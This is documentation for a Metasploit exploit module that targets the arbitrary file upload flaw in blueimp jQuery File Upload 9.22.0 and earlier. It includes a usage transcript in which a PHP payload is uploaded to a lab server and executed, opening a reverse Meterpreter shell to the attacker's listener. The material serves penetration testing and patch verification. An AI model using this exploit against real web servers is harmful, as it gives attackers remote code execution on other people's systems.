2.1 KiB
2.1 KiB
Introduction
This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
file may be disabled, enabling exploitation of this vulnerability.
This vulnerability has been exploited in the wild since at least 2015
and was publicly disclosed to the vendor in 2018. It has been present
since the .htaccess change in Apache 2.3.9.
This module provides a generic exploit against the jQuery widget.
Setup
Targets
Id Name
-- ----
0 PHP Dropper
1 Linux Dropper
Options
TARGETURI
Set this to the base path of jQuery File Upload. /jQuery-File-Upload
and those including a version are common. /upload may be another.
You may want to use another tool like dirb to handle enumeration.
Usage
msf5 exploit(unix/webapp/jquery_file_upload) > check
[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] 172.28.128.3:80 The target appears to be vulnerable.
msf5 exploit(unix/webapp/jquery_file_upload) > run
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] Checking /jQuery-File-Upload/server/php/index.php
[+] Found /jQuery-File-Upload/server/php/index.php
[*] Uploading payload
[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/FJx2tZWpurPHKIWaYX7sbGTraXTNlRaBB.php
[*] Executing payload
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54414) at 2018-10-23 07:13:22 -0500
[*] Deleting payload
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu-xenial
OS : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >